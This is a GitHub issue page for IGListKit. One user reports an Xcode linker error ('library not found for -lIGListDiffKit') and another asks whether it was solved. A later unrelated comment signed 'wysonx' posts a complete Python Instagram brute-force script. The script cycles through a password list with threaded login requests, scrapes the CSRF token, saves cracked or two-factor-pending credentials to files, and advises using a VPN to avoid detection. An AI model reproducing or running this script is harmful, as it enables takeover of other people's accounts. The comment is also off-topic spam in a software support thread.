Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Xcode v12.5.1 won't install IGListKit, says no such module, tried via coco pods and SPM #1533

Open
2 of 3 tasks
javyduty opened this issue Oct 2, 2021 · 2 comments
Open
2 of 3 tasks

Comments

@javyduty
Copy link

javyduty commented Oct 2, 2021

New issue checklist

  • I have reviewed the README and documentation
  • I have searched existing issues and this is not a duplicate
  • I have attempted to reproduce the issue and include an example project.

General information

  • IGListKit version: 4.0
  • iOS version(s): 14.4
  • CocoaPods/Carthage version: 1.10.2
  • Xcode version: 12.5.1
  • Devices/Simulators affected: all
  • Reproducible in the demo project? (Yes/No): no
  • Related issues:

Debug information

# Please include debug logs using the following lldb command:
ld: warning: directory not found for option '-L/filepath/GListDiffKit'
ld: warning: directory not found for option '-L/filepath//Debug-iphonesimulator/IGListKit'
ld: library not found for -lIGListDiffKit
clang: error: linker command failed with exit code 1 (use -v to see invocation)
@yahajat
Copy link

yahajat commented Apr 30, 2024

Do you solve it?

@wysonx
Copy link

wysonx commented May 4, 2024

author : akash black hat hacke

darkweb pleyer 127.0.0.1

from future import absolute_import
from future import print_function
import requests, sys, threading, time, os, random
from random import randint
from six.moves import input

CheckVersion = str(sys.version)
import re
from datetime import datetime

print('''
\033[32m██╗███╗ ██╗███████╗████████╗ █████╗
██║████╗ ██║██╔════╝╚══██╔══╝██╔══██╗
██║██╔██╗ ██║███████╗ ██║ ███████║
██║██║╚██╗██║╚════██║ ██║ ██╔══██║
██║██║ ╚████║███████║ ██║ ██║ ██║
╚═╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
┌┐ ┬─┐┬ ┬┌┬┐ ┌─┐┌─┐┬─┐┌─┐┌─┐ V1.0
├┴┐├┬┘│ │ │ ├┤ │ │├┬┘│ ├┤
└─┘┴└─└─┘ ┴ └ └─┘┴└─└─┘└─┘
\033[38m***\033[31mInstgrame Brute Force Attack \033[38m***
\033[33m*\033[32mDeveloper:W Y S O N X \033[33m *
\033[35m*\033[32mInstagram:wysonx \033[35m *
\033[31m*\033[32mYouTube :WYSONX \033[31m*
\033[37m*\033[32mPassList :Attack\033[37m *
\033[35m**********\033[31m*********\033[33m*********\033[32m*******''')
print('''\033[31mNotice :-> Management depends on vpn software
Please use it before running the tool.\033[32m.''')
class InstaBrute(object):
def init(self):

    try:
        user = input('username : ')
        Combo = input('passList : ')
        print('\n----------------------------')

    except:
        print(' The tool was arrested exit ')
        sys.exit()

    with open(Combo, 'r') as x:
        Combolist = x.read().splitlines()
    thread = []
    self.Coutprox = 0
    for combo in Combolist:
        password = combo.split(':')[0]
        t = threading.Thread(target=self.New_Br, args=(user, password))
        t.start()
        thread.append(t)
        time.sleep(0.9)
    for j in thread:
        j.join()

def cls(self):
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])

def New_Br(self, user, pwd):
    link = 'https://www.instagram.com/accounts/login/'
    login_url = 'https://www.instagram.com/accounts/login/ajax/'

    time = int(datetime.now().timestamp())

    payload = {
        'username': user,
        'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}',
        'queryParams': {},
        'optIntoOneTap': 'false'
    }

    with requests.Session() as s:
        r = s.get(link)
        csrf = re.findall(r"csrf_token\":\"(.*?)\"", r.text)[0]
        r = s.post(login_url, data=payload, headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
            "X-Requested-With": "XMLHttpRequest",
            "Referer": "https://www.instagram.com/accounts/login/",
            "x-csrftoken": csrf
        })
        print(f'{user}:{pwd}\n----------------------------')

        if 'authenticated": true' in r.text:
            print(('' + user + ':' + pwd + ' --> Good hack '))
            with open('good.txt', 'a') as x:
                x.write(user + ':' + pwd + '\n')
        elif 'two_factor_required' in r.text:
            print(('' + user + ':' + pwd + ' -->  Good It has to be checked '))
            with open('results_NeedVerfiy.txt', 'a') as x:
                x.write(user + ':' + pwd + '\n')

InstaBrute()

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants